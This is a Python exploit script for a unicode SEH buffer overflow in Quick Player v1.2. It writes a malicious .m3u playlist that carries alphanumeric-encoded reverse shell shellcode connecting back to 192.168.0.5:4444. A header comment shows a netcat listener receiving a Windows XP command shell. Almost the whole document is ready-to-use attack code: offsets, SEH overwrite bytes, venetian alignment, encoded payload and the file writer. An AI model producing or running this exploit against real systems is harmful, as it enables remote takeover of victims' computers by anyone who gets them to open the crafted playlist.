#!/usr/bin/python
#
# Vulnerability	: Quick Player v1.2 unicode buffer overflow exploit
# coded by	: mr_me
# reference	: http://www.exploit-db.com/exploits/10759 (corelanc0d3r)
# Tested on	: XP SP3 En (VirtualBox)
# Greetz to	: Corelan Security Team::corelanc0d3r/EdiStrosar/Rick2600/MarkoT
#
# mrme@backtrack:~$ nc -lvp 4444
# listening on [any] 4444 ...
# 192.168.0.4: inverse host lookup failed: Unknown server error : Connection timed out
# connect to [192.168.0.5] from (UNKNOWN) [192.168.0.4] 1144
# Microsoft Windows XP [Version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
#
# C:\>
#
# Note: We don't need a header. Enjoy :)

print "|------------------------------------------------------------------|"
print "|                         __               __	       		   |"
print "|   _________  ________  / /___ _____     / /____  ____ _____ ___  |"
print "|  / ___/ __ \/ ___/ _ \/ / __ `/ __ \   / __/ _ \/ __ `/ __ `__ \ |"
print "| / /__/ /_/ / /  /  __/ / /_/ / / / /  / /_/  __/ /_/ / / / / / / |"
print "| \___/\____/_/   \___/_/\__,_/_/ /_/   \__/\___/\__,_/_/ /_/ /_/  |"
print "|-------------------------------------------------- EIP Hunters ---|"
print "[+] Quick Player v1.2 unicode buffer overflow exploit"

junk = "\x41" * 536;		# buffer offset
nseh = "\x41\x6d";		# bytes not affecting stack
seh = "\x41\x4d";		# pop pop ret (unicode)
popeax = "\x58";		# pop eax (current addr = 0x0012E270)
fill = "\x6d";			# venetian shellcode
addeax = "\x05\x03\x01";	# add eax, 1000300
filler = "\x6d";       		# venetian shellcode 
subeax = "\x2d\x01\x01"		# sub eax, 1000100 (eax is now + 200)
morefiller = "\x6d";		# venetian shellcode
pusheax = "\x50";		# setup stack for shellcode
evenmorefiller = "\x6d";	# venetian shellcode
retn = "\xc3";			# retn to the stack and execute shell
morejunk = "\x44" * 239;	# extra 200 bytes and 39 for address alignment

# reverse shell (192.168.0.5:4444) 

reverseshell = ("PPYAIAIAIAIAQATAXAZAPA3QADAZ"
"ABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA"
"58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABABA"
"B30APB944JBKLQZZKPM9XJYKOKOKOC0DK2LMTO4TKOUOL"
"TKSLKURXKQZOTKPOLXDK1OMPKQJKQ9TKODTKKQJNP1Y0V"
"9FLSTWP2TKW7QXJLMKQWRJKL4OK0TMTMX2UIUTK1OO4KQ"
"ZKQVTKLLPK4K1OMLM1ZKLCNL4KU9RLO4MLQQGSNQYKS44"
"KOSNPTKOPLLTKRPMLFMDK10M81N2H4NPNLNZLPPKO9FQV"
"PSQVRHP3NRQXD73CNRQOPTKO8PRHXKJMKLOKPPKOHV1OS"
"YK5QVU1JMM8KRPU2JKRKOXPRH8YLIKEFMPWKOJ6QC0SR3"
"QCOSPS0C1CKO8PRHWPW8KPM5QVRHLQQL36R359YQTUBHJ"
"LZYEZQPPWKOIFRJLPPQQEKOXP36RJQTS62H332M1ZB01I"
"MY8LSYYWRJOT599RNQY0ZSFJF53YKMKN12NMKNQ2NLTM2"
"ZNXVKFKVKQXRRKN7CMFKO2UMXKO9FQK271B21PQ21BJKQ"
"PQB1QE0QKOXPQX6MHYKUHNB3KOYFQZKOKONWKOXPQXYW2"
"YI6T9KOSEM4KO9FKOBWKLKOZ02HL0SZLDQOR3KOZ6KOXP"
"LJA");

muhahaha = junk + nseh + seh + popeax + fill + addeax + filler;
muhahaha += subeax + morefiller + pusheax + evenmorefiller + retn;
muhahaha += morejunk + reverseshell;

try:
	exploit = open('playme_in_quickplayer.m3u','w');
	exploit.write(muhahaha);
	print "[+] Generating playme_in_quickplayer.m3u"
	print "[+] Done!"
	exploit.close();
except:
	print "[-] Cannot generate exploit file.. check your privileges"

